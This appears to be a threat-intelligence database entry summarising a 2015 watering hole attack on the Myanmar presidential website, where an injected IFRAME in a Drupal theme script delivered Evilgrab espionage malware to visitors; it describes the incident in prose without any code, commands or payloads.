Cyber Incident Victim: President of Myanmar
Date:
May 2015
Location:
Myanmar
Summary
A watering hole attack compromised the President of Myanmar's official website via malicious IFRAME injection into a Drupal theme JavaScript file, delivering the Evilgrab malware to visitors. Threat actors maintained prolonged access to the site, targeting individuals and organizations with political or business interests in the country. Following disclosure, operators migrated content to a new domain lacking the exploit code, suggesting remediation efforts. The campaign leveraged strategic website compromise to harvest information from high-value targets affiliated with Myanmar's governance and international engagements.
| CIA Posture | Motives | Tactics, Techniques & Procedures |
|---|---|---|
| Available to members | 2 motives | 2 techniques |
| Threat Actor | Type | Location |
|---|---|---|
| 1 actor | Available to members | Available to members |
Description
On May 12, 2015, Unit 42 identified a watering hole attack targeting the official website of the President of Myanmar, hosted at "www.president-office.gov[.]mm". Threat actors compromised the site by injecting a malicious inline frame (IFRAME) into a JavaScript file utilized by the Drupal content management system for the site's theme. The attack automatically delivered malware to visitors without requiring interaction, leveraging the website's legitimacy to target individuals in Myanmar, those engaged in political relations with the country, or organizations conducting business there. Evidence indicated threat actors maintained unauthorized access to the website since at least November 2014, suggesting prolonged compromise prior to detection. The injected code redirected visitors to infrastructure controlled by attackers, facilitating malware deployment. The primary objective appeared to be intelligence gathering from high-value targets associated with Myanmar's political or economic sectors. Unit 42 reported the compromise to website operators, prompting immediate takedown of the infected domain.
Following the disclosure, operators migrated official content to a new domain, "www.myanmarpresidentoffice.info", which retained structural and content artifacts from the original site but contained no exploit code, indicating remediation efforts. The delivered malware, identified as Evilgrab (also known as Vidgrab), exhibited information-stealing capabilities consistent with espionage objectives. Analysis revealed the malware's functionality to harvest system information, document files, and credentials from compromised hosts. Threat infrastructure associated with the attack included multiple command-and-control servers and redirector domains designed to obscure operational endpoints. The incident disrupted public access to presidential communications during the remediation period, though no specific data breaches or operational impacts beyond the website compromise were detailed in available reporting. The swift containment through domain migration and code sanitization limited further exposure to the watering hole mechanism.